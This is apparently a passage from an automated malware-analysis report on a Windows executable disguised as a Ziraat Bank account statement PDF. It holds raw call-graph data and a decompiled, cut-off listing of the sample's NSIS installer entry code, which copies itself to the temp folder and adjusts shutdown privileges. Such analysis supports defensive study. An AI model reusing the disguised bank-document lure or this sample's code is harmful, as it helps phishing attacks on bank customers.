4049e9 4288->4289 4290 404929 GetDlgItem 4288->4290 4297 40462b 8 API calls 4289->4297 4293 404943 4290->4293 4294 4049aa 4290->4294 4291->4288 4291->4289 4295 4048f0 GetDlgItem SendMessageW 4291->4295 4296 404802 4292->4296 4293->4294 4300 404969 SendMessageW LoadCursorW SetCursor 4293->4300 4294->4289 4301 4049bc 4294->4301 4319 4045e6 EnableWindow 4295->4319 4299 4045c4 18 API calls 4296->4299 4307 4049e4 4297->4307 4303 40480f CheckDlgButton 4299->4303 4323 404a32 4300->4323 4305 4049d2 4301->4305 4306 4049c2 SendMessageW 4301->4306 4302 40491a 4320 404a0e 4302->4320 4317 4045e6 EnableWindow 4303->4317 4305->4307 4308 4049d8 SendMessageW 4305->4308 4306->4305 4308->4307 4312 40482d GetDlgItem 4318 4045f9 SendMessageW 4312->4318 4314 404843 SendMessageW 4315 404860 GetSysColor 4314->4315 4316 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4314->4316 4315->4316 4316->4307 4317->4312 4318->4314 4319->4302 4321 404a21 SendMessageW 4320->4321 4322 404a1c 4320->4322 4321->4288 4322->4321 4326 405c8e ShellExecuteExW 4323->4326 4325 404998 LoadCursorW SetCursor 4325->4294 4326->4325 4327 402383 4328 40238a 4327->4328 4331 40239d 4327->4331 4329 4066a5 17 API calls 4328->4329 4330 402397 4329->4330 4332 405cc8 MessageBoxIndirectW 4330->4332 4332->4331 4333 402c05 SendMessageW 4334 402c2a 4333->4334 4335 402c1f InvalidateRect 4333->4335 4335->4334 4336 405809 4337 4059b3 4336->4337 4338 40582a GetDlgItem GetDlgItem GetDlgItem 4336->4338 4340 4059bc GetDlgItem CreateThread CloseHandle 4337->4340 4342 4059e4 4337->4342 4381 4045f9 SendMessageW 4338->4381 4340->4342 4341 40589a 4351 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4341->4351 4343 405a0f 4342->4343 4344 405a34 4342->4344 4345 4059fb ShowWindow ShowWindow 4342->4345 4346 405a6f 4343->4346 4348 405a23 4343->4348 4349 405a49 ShowWindow 4343->4349 4350 40462b 8 API calls 4344->4350 4383 4045f9 SendMessageW 4345->4383 4346->4344 4352 405a7d SendMessageW 4346->4352 4353 40459d 
SendMessageW 4348->4353 4355 405a69 4349->4355 4356 405a5b 4349->4356 4354 405a42 4350->4354 4357 4058f3 SendMessageW SendMessageW 4351->4357 4358 40590f 4351->4358 4352->4354 4359 405a96 CreatePopupMenu 4352->4359 4353->4344 4363 40459d SendMessageW 4355->4363 4362 4056ca 24 API calls 4356->4362 4357->4358 4360 405922 4358->4360 4361 405914 SendMessageW 4358->4361 4364 4066a5 17 API calls 4359->4364 4365 4045c4 18 API calls 4360->4365 4361->4360 4362->4355 4363->4346 4366 405aa6 AppendMenuW 4364->4366 4367 405932 4365->4367 4368 405ac3 GetWindowRect 4366->4368 4369 405ad6 TrackPopupMenu 4366->4369 4370 40593b ShowWindow 4367->4370 4371 40596f GetDlgItem SendMessageW 4367->4371 4368->4369 4369->4354 4372 405af1 4369->4372 4373 405951 ShowWindow 4370->4373 4374 40595e 4370->4374 4371->4354 4375 405996 SendMessageW SendMessageW 4371->4375 4376 405b0d SendMessageW 4372->4376 4373->4374 4382 4045f9 SendMessageW 4374->4382 4375->4354 4376->4376 4377 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4376->4377 4379 405b4f SendMessageW 4377->4379 4379->4379 4380 405b78 GlobalUnlock SetClipboardData CloseClipboard 4379->4380 4380->4354 4381->4341 4382->4371 4383->4343 4384 40248a 4385 402da6 17 API calls 4384->4385 4386 40249c 4385->4386 4387 402da6 17 API calls 4386->4387 4388 4024a6 4387->4388 4389 4024de 4388->4389 4390 40292e 4388->4390 4391 402da6 17 API calls 4388->4391 4392 4024ea 4389->4392 4394 402d84 17 API calls 4389->4394 4393 4024d4 lstrlenW 4391->4393 4395 402509 RegSetValueExW 4392->4395 4396 403371 44 API calls 4392->4396 4393->4389 4394->4392 4397 40251f RegCloseKey 4395->4397 4396->4395 4397->4390 4399 404e0b 4400 404e37 4399->4400 4401 404e1b 4399->4401 4403 404e6a 4400->4403 4404 404e3d SHGetPathFromIDListW 4400->4404 4410 405cac GetDlgItemTextW 4401->4410 4406 404e4d 4404->4406 4409 404e54 SendMessageW 4404->4409 4405 404e28 SendMessageW 4405->4400 4407 40140b 2 API calls 4406->4407 4407->4409 4409->4403 4410->4405 4411 40290b 4412 402da6 17 
API calls 4411->4412 4413 402912 FindFirstFileW 4412->4413 4414 402925 4413->4414 4415 40293a 4413->4415 4419 4065af wsprintfW 4415->4419 4417 402943 4420 406668 lstrcpynW 4417->4420 4419->4417 4420->4414 4421 40190c 4422 401943 4421->4422 4423 402da6 17 API calls 4422->4423 4424 401948 4423->4424 4425 405d74 67 API calls 4424->4425 4426 401951 4425->4426 4427 40190f 4428 402da6 17 API calls 4427->4428 4429 401916 4428->4429 4430 405cc8 MessageBoxIndirectW 4429->4430 4431 40191f 4430->4431 4432 401491 4433 4056ca 24 API calls 4432->4433 4434 401498 4433->4434 4435 402891 4436 402898 4435->4436 4442 402ba9 4435->4442 4437 402d84 17 API calls 4436->4437 4438 40289f 4437->4438 4439 4028ae SetFilePointer 4438->4439 4440 4028be 4439->4440 4439->4442 4443 4065af wsprintfW 4440->4443 4443->4442 4444 401f12 4445 402da6 17 API calls 4444->4445 4446 401f18 4445->4446 4447 402da6 17 API calls 4446->4447 4448 401f21 4447->4448 4449 402da6 17 API calls 4448->4449 4450 401f2a 4449->4450 4451 402da6 17 API calls 4450->4451 4452 401f33 4451->4452 4453 401423 24 API calls 4452->4453 4454 401f3a 4453->4454 4461 405c8e ShellExecuteExW 4454->4461 4456 401f82 4457 406ae0 5 API calls 4456->4457 4458 40292e 4456->4458 4459 401f9f CloseHandle 4457->4459 4459->4458 4461->4456 4462 402f93 4463 402fa5 SetTimer 4462->4463 4464 402fbe 4462->4464 4463->4464 4465 40300c 4464->4465 4466 403012 MulDiv 4464->4466 4467 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4466->4467 4467->4465 4483 401d17 4484 402d84 17 API calls 4483->4484 4485 401d1d IsWindow 4484->4485 4486 401a20 4485->4486 4487 401b9b 4488 401ba8 4487->4488 4489 401bec 4487->4489 4492 401c31 4488->4492 4496 401bbf 4488->4496 4490 401bf1 4489->4490 4491 401c16 GlobalAlloc 4489->4491 4497 40239d 4490->4497 4508 406668 lstrcpynW 4490->4508 4493 4066a5 17 API calls 4491->4493 4494 4066a5 17 API calls 4492->4494 4492->4497 4493->4492 4499 402397 4494->4499 4506 406668 lstrcpynW 4496->4506 4498 401c03 GlobalFree 4498->4497 4502 405cc8 
MessageBoxIndirectW 4499->4502 4501 401bce 4507 406668 lstrcpynW 4501->4507 4502->4497 4504 401bdd 4509 406668 lstrcpynW 4504->4509 4506->4501 4507->4504 4508->4498 4509->4497 4510 40261c 4511 402da6 17 API calls 4510->4511 4512 402623 4511->4512 4515 406158 GetFileAttributesW CreateFileW 4512->4515 4514 40262f 4515->4514 4523 40149e 4524 4014ac PostQuitMessage 4523->4524 4525 40239d 4523->4525 4524->4525 4526 40259e 4536 402de6 4526->4536 4529 402d84 17 API calls 4530 4025b1 4529->4530 4531 4025d9 RegEnumValueW 4530->4531 4532 4025cd RegEnumKeyW 4530->4532 4533 40292e 4530->4533 4534 4025ee RegCloseKey 4531->4534 4532->4534 4534->4533 4537 402da6 17 API calls 4536->4537 4538 402dfd 4537->4538 4539 4064d5 RegOpenKeyExW 4538->4539 4540 4025a8 4539->4540 4540->4529 4541 4015a3 4542 402da6 17 API calls 4541->4542 4543 4015aa SetFileAttributesW 4542->4543 4544 4015bc 4543->4544 3750 401fa4 3751 402da6 17 API calls 3750->3751 3752 401faa 3751->3752 3753 4056ca 24 API calls 3752->3753 3754 401fb4 3753->3754 3755 405c4b 2 API calls 3754->3755 3756 401fba 3755->3756 3757 401fdd CloseHandle 3756->3757 3760 40292e 3756->3760 3765 406ae0 WaitForSingleObject 3756->3765 3757->3760 3761 401fcf 3762 401fd4 3761->3762 3763 401fdf 3761->3763 3770 4065af wsprintfW 3762->3770 3763->3757 3766 406afa 3765->3766 3767 406b0c GetExitCodeProcess 3766->3767 3768 406a71 2 API calls 3766->3768 3767->3761 3769 406b01 WaitForSingleObject 3768->3769 3769->3766 3770->3757 3870 403c25 3871 403c40 3870->3871 3872 403c36 CloseHandle 3870->3872 3873 403c54 3871->3873 3874 403c4a CloseHandle 3871->3874 3872->3871 3879 403c82 3873->3879 3874->3873 3877 405d74 67 API calls 3878 403c65 3877->3878 3880 403c90 3879->3880 3881 403c59 3880->3881 3882 403c95 FreeLibrary GlobalFree 3880->3882 3881->3877 3882->3881 3882->3882 4545 40202a 4546 402da6 17 API calls 4545->4546 4547 402031 4546->4547 4548 406a35 5 API calls 4547->4548 4549 402040 4548->4549 4550 4020cc 4549->4550 4551 40205c GlobalAlloc 4549->4551 
4551->4550 4552 402070 4551->4552 4553 406a35 5 API calls 4552->4553 4554 402077 4553->4554 4555 406a35 5 API calls 4554->4555 4556 402081 4555->4556 4556->4550 4560 4065af wsprintfW 4556->4560 4558 4020ba 4561 4065af wsprintfW 4558->4561 4560->4558 4561->4550 4562 40252a 4563 402de6 17 API calls 4562->4563 4564 402534 4563->4564 4565 402da6 17 API calls 4564->4565 4566 40253d 4565->4566 4567 402548 RegQueryValueExW 4566->4567 4572 40292e 4566->4572 4568 40256e RegCloseKey 4567->4568 4569 402568 4567->4569 4568->4572 4569->4568 4573 4065af wsprintfW 4569->4573 4573->4568 4574 4021aa 4575 402da6 17 API calls 4574->4575 4576 4021b1 4575->4576 4577 402da6 17 API calls 4576->4577 4578 4021bb 4577->4578 4579 402da6 17 API calls 4578->4579 4580 4021c5 4579->4580 4581 402da6 17 API calls 4580->4581 4582 4021cf 4581->4582 4583 402da6 17 API calls 4582->4583 4584 4021d9 4583->4584 4585 402218 CoCreateInstance 4584->4585 4586 402da6 17 API calls 4584->4586 4589 402237 4585->4589 4586->4585 4587 401423 24 API calls 4588 4022f6 4587->4588 4589->4587 4589->4588 4597 401a30 4598 402da6 17 API calls 4597->4598 4599 401a39 ExpandEnvironmentStringsW 4598->4599 4600 401a4d 4599->4600 4602 401a60 4599->4602 4601 401a52 lstrcmpW 4600->4601 4600->4602 4601->4602 4603 405031 GetDlgItem GetDlgItem 4604 405083 7 API calls 4603->4604 4608 4052a8 4603->4608 4605 40512a DeleteObject 4604->4605 4606 40511d SendMessageW 4604->4606 4607 405133 4605->4607 4606->4605 4609 40516a 4607->4609 4611 4066a5 17 API calls 4607->4611 4625 40538a 4608->4625 4635 405317 4608->4635 4657 404f7f SendMessageW 4608->4657 4612 4045c4 18 API calls 4609->4612 4610 405436 4614 405440 SendMessageW 4610->4614 4615 405448 4610->4615 4616 40514c SendMessageW SendMessageW 4611->4616 4617 40517e 4612->4617 4613 40529b 4621 40462b 8 API calls 4613->4621 4614->4615 4627 405461 4615->4627 4628 40545a ImageList_Destroy 4615->4628 4632 405471 4615->4632 4616->4607 4618 4045c4 18 API calls 4617->4618 4636 40518f 4618->4636 4619 
4053e3 SendMessageW 4619->4613 4624 4053f8 SendMessageW 4619->4624 4620 40537c SendMessageW 4620->4625 4626 405637 4621->4626 4623 4055eb 4623->4613 4633 4055fd ShowWindow GetDlgItem ShowWindow 4623->4633 4630 40540b 4624->4630 4625->4610 4625->4613 4625->4619 4631 40546a GlobalFree 4627->4631 4627->4632 4628->4627 4629 40526a GetWindowLongW SetWindowLongW 4634 405283 4629->4634 4641 40541c SendMessageW 4630->4641 4631->4632 4632->4623 4650 4054ac 4632->4650 4662 404fff 4632->4662 4633->4613 4637 4052a0 4634->4637 4638 405288 ShowWindow 4634->4638 4635->4620 4635->4625 4636->4629 4640 4051e2 SendMessageW 4636->4640 4642 405265 4636->4642 4644 405220 SendMessageW 4636->4644 4645 405234 SendMessageW 4636->4645 4656 4045f9 SendMessageW 4637->4656 4655 4045f9 SendMessageW 4638->4655 4640->4636 4641->4610 4642->4629 4642->4634 4644->4636 4645->4636 4647 4055b6 4648 4055c1 InvalidateRect 4647->4648 4651 4055cd 4647->4651 4648->4651 4649 4054da SendMessageW 4654 4054f0 4649->4654 4650->4649 4650->4654 4651->4623 4671 404f3a 4651->4671 4653 405564 SendMessageW SendMessageW 4653->4654 4654->4647 4654->4653 4655->4613 4656->4608 4658 404fa2 GetMessagePos ScreenToClient SendMessageW 4657->4658 4659 404fde SendMessageW 4657->4659 4660 404fd6 4658->4660 4661 404fdb 4658->4661 4659->4660 4660->4635 4661->4659 4674 406668 lstrcpynW 4662->4674 4664 405012 4675 4065af wsprintfW 4664->4675 4666 40501c 4667 40140b 2 API calls 4666->4667 4668 405025 4667->4668 4676 406668 lstrcpynW 4668->4676 4670 40502c 4670->4650 4677 404e71 4671->4677 4673 404f4f 4673->4623 4674->4664 4675->4666 4676->4670 4678 404e8a 4677->4678 4679 4066a5 17 API calls 4678->4679 4680 404eee 4679->4680 4681 4066a5 17 API calls 4680->4681 4682 404ef9 4681->4682 4683 4066a5 17 API calls 4682->4683 4684 404f0f lstrlenW wsprintfW SetDlgItemTextW 4683->4684 4684->4673 4690 4023b2 4691 4023c0 4690->4691 4692 4023ba 4690->4692 4694 402da6 17 API calls 4691->4694 4695 4023ce 4691->4695 4693 402da6 17 API calls 4692->4693 
4693->4691 4694->4695 4696 4023dc 4695->4696 4697 402da6 17 API calls 4695->4697 4698 402da6 17 API calls 4696->4698 4697->4696 4699 4023e5 WritePrivateProfileStringW 4698->4699 4700 404734 lstrlenW 4701 404753 4700->4701 4702 404755 WideCharToMultiByte 4700->4702 4701->4702 4703 402434 4704 402467 4703->4704 4705 40243c 4703->4705 4707 402da6 17 API calls 4704->4707 4706 402de6 17 API calls 4705->4706 4708 402443 4706->4708 4709 40246e 4707->4709 4711 402da6 17 API calls 4708->4711 4712 40247b 4708->4712 4714 402e64 4709->4714 4713 402454 RegDeleteValueW RegCloseKey 4711->4713 4713->4712 4715 402e78 4714->4715 4717 402e71 4714->4717 4715->4717 4718 402ea9 4715->4718 4717->4712 4719 4064d5 RegOpenKeyExW 4718->4719 4720 402ed7 4719->4720 4721 402ee7 RegEnumValueW 4720->4721 4722 402f0a 4720->4722 4729 402f81 4720->4729 4721->4722 4723 402f71 RegCloseKey 4721->4723 4722->4723 4724 402f46 RegEnumKeyW 4722->4724 4725 402f4f RegCloseKey 4722->4725 4727 402ea9 6 API calls 4722->4727 4723->4729 4724->4722 4724->4725 4726 406a35 5 API calls 4725->4726 4728 402f5f 4726->4728 4727->4722 4728->4729 4730 402f63 RegDeleteKeyW 4728->4730 4729->4717 4730->4729 4731 401735 4732 402da6 17 API calls 4731->4732 4733 40173c SearchPathW 4732->4733 4734 401757 4733->4734 4735 404ab5 4736 404ae1 4735->4736 4737 404af2 4735->4737 4796 405cac GetDlgItemTextW 4736->4796 4739 404afe GetDlgItem 4737->4739 4745 404b5d 4737->4745 4741 404b12 4739->4741 4740 404aec 4743 4068ef 5 API calls 4740->4743 4744 404b26 SetWindowTextW 4741->4744 4752 405fe2 4 API calls 4741->4752 4742 404c41 4746 404df0 4742->4746 4798 405cac GetDlgItemTextW 4742->4798 4743->4737 4748 4045c4 18 API calls 4744->4748 4745->4742 4745->4746 4749 4066a5 17 API calls 4745->4749 4751 40462b 8 API calls 4746->4751 4753 404b42 4748->4753 4754 404bd1 SHBrowseForFolderW 4749->4754 4750 404c71 4755 40603f 18 API calls 4750->4755 4756 404e04 4751->4756 4757 404b1c 4752->4757 4758 4045c4 18 API calls 4753->4758 4754->4742 4759 404be9 
CoTaskMemFree 4754->4759 4760 404c77 4755->4760 4757->4744 4763 405f37 3 API calls 4757->4763 4761 404b50 4758->4761 4762 405f37 3 API calls 4759->4762 4799 406668 lstrcpynW 4760->4799 4797 4045f9 SendMessageW 4761->4797 4765 404bf6 4762->4765 4763->4744 4768 404c2d SetDlgItemTextW 4765->4768 4772 4066a5 17 API calls 4765->4772 4767 404b56 4770 406a35 5 API calls 4767->4770 4768->4742 4769 404c8e 4771 406a35 5 API calls 4769->4771 4770->4745 4779 404c95 4771->4779 4773 404c15 lstrcmpiW 4772->4773 4773->4768 4776 404c26 lstrcatW 4773->4776 4774 404cd6 4800 406668 lstrcpynW 4774->4800 4776->4768 4777 404cdd 4778 405fe2 4 API calls 4777->4778 4780 404ce3 GetDiskFreeSpaceW 4778->4780 4779->4774 4782 405f83 2 API calls 4779->4782 4784 404d2e 4779->4784 4783 404d07 MulDiv 4780->4783 4780->4784 4782->4779 4783->4784 4785 404d9f 4784->4785 4786 404f3a 20 API calls 4784->4786 4787 404dc2 4785->4787 4789 40140b 2 API calls 4785->4789 4788 404d8c 4786->4788 4801 4045e6 EnableWindow 4787->4801 4791 404da1 SetDlgItemTextW 4788->4791 4792 404d91 4788->4792 4789->4787 4791->4785 4794 404e71 20 API calls 4792->4794 4793 404dde 4793->4746 4795 404a0e SendMessageW 4793->4795 4794->4785 4795->4746 4796->4740 4797->4767 4798->4750 4799->4769 4800->4777 4801->4793 4802 401d38 4803 402d84 17 API calls 4802->4803 4804 401d3f 4803->4804 4805 402d84 17 API calls 4804->4805 4806 401d4b GetDlgItem 4805->4806 4807 402638 4806->4807 4808 4014b8 4809 4014be 4808->4809 4810 401389 2 API calls 4809->4810 4811 4014c6 4810->4811 4812 40563e 4813 405662 4812->4813 4814 40564e 4812->4814 4817 40566a IsWindowVisible 4813->4817 4823 405681 4813->4823 4815 405654 4814->4815 4816 4056ab 4814->4816 4819 404610 SendMessageW 4815->4819 4818 4056b0 CallWindowProcW 4816->4818 4817->4816 4820 405677 4817->4820 4821 40565e 4818->4821 4819->4821 4822 404f7f 5 API calls 4820->4822 4822->4823 4823->4818 4824 404fff 4 API calls 4823->4824 4824->4816 4825 40263e 4826 402652 4825->4826 4827 40266d 4825->4827 4828 
402d84 17 API calls 4826->4828 4829 402672 4827->4829 4830 40269d 4827->4830 4837 402659 4828->4837 4831 402da6 17 API calls 4829->4831 4832 402da6 17 API calls 4830->4832 4834 402679 4831->4834 4833 4026a4 lstrlenW 4832->4833 4833->4837 4842 40668a WideCharToMultiByte 4834->4842 4836 40268d lstrlenA 4836->4837 4838 4026d1 4837->4838 4839 4026e7 4837->4839 4841 406239 5 API calls 4837->4841 4838->4839 4840 40620a WriteFile 4838->4840 4840->4839 4841->4838 4842->4836

Control-flow Graph (function starting at 403640; graph not reproduced, nodes were marked Executed / Not Executed)
                                                  C-Code - Quality: 78%
                                                  			_entry_() {
                                                  				WCHAR* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				signed int _v20;
                                                  				int _v24;
                                                  				int _v28;
                                                  				struct _TOKEN_PRIVILEGES _v40;
                                                  				signed char _v42;
                                                  				int _v44;
                                                  				signed int _v48;
                                                  				intOrPtr _v278;
                                                  				signed short _v310;
                                                  				struct _OSVERSIONINFOW _v324;
                                                  				struct _SHFILEINFOW _v1016;
                                                  				intOrPtr* _t88;
                                                  				WCHAR* _t92;
                                                  				char* _t94;
                                                  				void _t97;
                                                  				void* _t116;
                                                  				WCHAR* _t118;
                                                  				signed int _t119;
                                                  				intOrPtr* _t123;
                                                  				void* _t137;
                                                  				void* _t143;
                                                  				void* _t148;
                                                  				void* _t152;
                                                  				void* _t157;
                                                  				signed int _t167;
                                                  				void* _t170;
                                                  				void* _t175;
                                                  				intOrPtr _t177;
                                                  				intOrPtr _t178;
                                                  				intOrPtr* _t179;
                                                  				int _t188;
                                                  				void* _t189;
                                                  				void* _t198;
                                                  				signed int _t204;
                                                  				signed int _t209;
                                                  				signed int _t214;
                                                  				signed int _t216;
                                                  				int* _t218;
                                                  				signed int _t226;
                                                  				signed int _t229;
                                                  				CHAR* _t231;
                                                  				char* _t232;
                                                  				signed int _t233;
                                                  				WCHAR* _t234;
                                                  				void* _t250;
                                                  
                                                  				_t216 = 0x20;
                                                  				_t188 = 0;
                                                  				_v24 = 0;
                                                  				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                  				_v20 = 0;
                                                  				SetErrorMode(0x8001); // executed
                                                  				_v324.szCSDVersion = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v324.dwOSVersionInfoSize = 0x11c;
                                                  				if(GetVersionExW( &_v324) == 0) {
                                                  					_v324.dwOSVersionInfoSize = 0x114;
                                                  					GetVersionExW( &_v324);
                                                  					asm("sbb eax, eax");
                                                  					_v42 = 4;
                                                  					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                  				}
                                                  				if(_v324.dwMajorVersion < 0xa) {
                                                  					_v310 = _v310 & 0x00000000;
                                                  				}
                                                  				 *0x42a318 = _v324.dwBuildNumber;
                                                  				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                  				if( *0x42a31e != 0x600) {
                                                  					_t179 = E00406A35(_t188);
                                                  					if(_t179 != _t188) {
                                                  						 *_t179(0xc00);
                                                  					}
                                                  				}
                                                  				_t231 = "UXTHEME";
                                                  				do {
                                                  					E004069C5(_t231); // executed
                                                  					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                  				} while ( *_t231 != 0);
                                                  				E00406A35(0xb);
                                                  				 *0x42a264 = E00406A35(9);
                                                  				_t88 = E00406A35(7);
                                                  				if(_t88 != _t188) {
                                                  					_t88 =  *_t88(0x1e);
                                                  					if(_t88 != 0) {
                                                  						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                  					}
                                                  				}
                                                  				__imp__#17();
                                                  				__imp__OleInitialize(_t188); // executed
                                                  				 *0x42a320 = _t88;
                                                  				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                  				E00406668(0x429260, L"NSIS Error");
                                                  				_t92 = GetCommandLineW();
                                                  				_t232 = L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
                                                  				E00406668(_t232, _t92);
                                                  				_t94 = _t232;
                                                  				_t233 = 0x22;
                                                  				 *0x42a260 = 0x400000;
                                                  				_t250 = L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"" - _t233; // 0x22
                                                  				if(_t250 == 0) {
                                                  					_t216 = _t233;
                                                  					_t94 =  &M00435002;
                                                  				}
                                                  				_t198 = CharNextW(E00405F64(_t94, _t216));
                                                  				_v16 = _t198;
                                                  				while(1) {
                                                  					_t97 =  *_t198;
                                                  					_t251 = _t97 - _t188;
                                                  					if(_t97 == _t188) {
                                                  						break;
                                                  					}
                                                  					_t209 = 0x20;
                                                  					__eflags = _t97 - _t209;
                                                  					if(_t97 != _t209) {
                                                  						L17:
                                                  						__eflags =  *_t198 - _t233;
                                                  						_v12 = _t209;
                                                  						if( *_t198 == _t233) {
                                                  							_v12 = _t233;
                                                  							_t198 = _t198 + 2;
                                                  							__eflags = _t198;
                                                  						}
                                                  						__eflags =  *_t198 - 0x2f;
                                                  						if( *_t198 != 0x2f) {
                                                  							L32:
                                                  							_t198 = E00405F64(_t198, _v12);
                                                  							__eflags =  *_t198 - _t233;
                                                  							if(__eflags == 0) {
                                                  								_t198 = _t198 + 2;
                                                  								__eflags = _t198;
                                                  							}
                                                  							continue;
                                                  						} else {
                                                  							_t198 = _t198 + 2;
                                                  							__eflags =  *_t198 - 0x53;
                                                  							if( *_t198 != 0x53) {
                                                  								L24:
                                                  								asm("cdq");
                                                  								asm("cdq");
                                                  								_t214 = L"NCRC" & 0x0000ffff;
                                                  								asm("cdq");
                                                  								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                  								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                  								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                  									L29:
                                                  									asm("cdq");
                                                  									asm("cdq");
                                                  									_t209 = L" /D=" & 0x0000ffff;
                                                  									asm("cdq");
                                                  									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                  									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                  									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                  										L31:
                                                  										_t233 = 0x22;
                                                  										goto L32;
                                                  									}
                                                  									__eflags =  *_t198 - _t229;
                                                  									if( *_t198 == _t229) {
                                                  										 *(_t198 - 4) = _t188;
                                                  										__eflags = _t198;
                                                  										E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t198);
                                                  										L37:
                                                  										_t234 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
                                                  										GetTempPathW(0x400, _t234);
                                                  										_t116 = E0040360F(_t198, _t251);
                                                  										_t252 = _t116;
                                                  										if(_t116 != 0) {
                                                  											L40:
                                                  											DeleteFileW(L"1033"); // executed
                                                  											_t118 = E004030D0(_t254, _v20); // executed
                                                  											_v8 = _t118;
                                                  											if(_t118 != _t188) {
                                                  												L68:
                                                  												ExitProcess(); // executed
                                                  												__imp__OleUninitialize(); // executed
                                                  												if(_v8 == _t188) {
                                                  													if( *0x42a2f4 == _t188) {
                                                  														L77:
                                                  														_t119 =  *0x42a30c;
                                                  														if(_t119 != 0xffffffff) {
                                                  															_v24 = _t119;
                                                  														}
                                                  														ExitProcess(_v24);
                                                  													}
                                                  													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                  														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                  														_v40.PrivilegeCount = 1;
                                                  														_v28 = 2;
                                                  														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                  													}
                                                  													_t123 = E00406A35(4);
                                                  													if(_t123 == _t188) {
                                                  														L75:
                                                  														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                  															goto L77;
                                                  														}
                                                  														goto L76;
                                                  													} else {
                                                  														_push(0x80040002);
                                                  														_push(0x25);
                                                  														_push(_t188);
                                                  														_push(_t188);
                                                  														_push(_t188);
                                                  														if( *_t123() == 0) {
                                                  															L76:
                                                  															E0040140B(9);
                                                  															goto L77;
                                                  														}
                                                  														goto L75;
                                                  													}
                                                  												}
                                                  												E00405CC8(_v8, 0x200010);
                                                  												ExitProcess(2);
                                                  											}
                                                  											if( *0x42a27c == _t188) {
                                                  												L51:
                                                  												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                  												_v24 = E00403D17(_t264);
                                                  												goto L68;
                                                  											}
                                                  											_t218 = E00405F64(L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"", _t188);
                                                  											if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
                                                  												L48:
                                                  												_t263 = _t218 - L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
                                                  												_v8 = L"Error launching installer";
                                                  												if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
                                                  													_t189 = E00405C33(__eflags);
                                                  													lstrcatW(_t234, L"~nsu");
                                                  													__eflags = _t189;
                                                  													if(_t189 != 0) {
                                                  														lstrcatW(_t234, "A");
                                                  													}
                                                  													lstrcatW(_t234, L".tmp");
                                                  													_t219 = L"C:\\Users\\frontdesk\\Desktop";
                                                  													_t137 = lstrcmpiW(_t234, L"C:\\Users\\frontdesk\\Desktop");
                                                  													__eflags = _t137;
                                                  													if(_t137 == 0) {
                                                  														L67:
                                                  														_t188 = 0;
                                                  														__eflags = 0;
                                                  														goto L68;
                                                  													} else {
                                                  														__eflags = _t189;
                                                  														_push(_t234);
                                                  														if(_t189 == 0) {
                                                  															E00405C16();
                                                  														} else {
                                                  															E00405B99();
                                                  														}
                                                  														SetCurrentDirectoryW(_t234);
                                                  														__eflags = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
                                                  														if(__eflags == 0) {
                                                  															E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t219);
                                                  														}
                                                  														E00406668(0x42b000, _v16);
                                                  														_t201 = "A" & 0x0000ffff;
                                                  														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                  														__eflags = _t143;
                                                  														_v12 = 0x1a;
                                                  														 *0x42b800 = _t143;
                                                  														do {
                                                  															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                  															DeleteFileW(0x420f08);
                                                  															__eflags = _v8;
                                                  															if(_v8 != 0) {
                                                  																_t148 = CopyFileW(L"C:\\Users\\frontdesk\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x420f08, 1);
                                                  																__eflags = _t148;
                                                  																if(_t148 != 0) {
                                                  																	E00406428(_t201, 0x420f08, 0);
                                                  																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                  																	_t152 = E00405C4B(0x420f08);
                                                  																	__eflags = _t152;
                                                  																	if(_t152 != 0) {
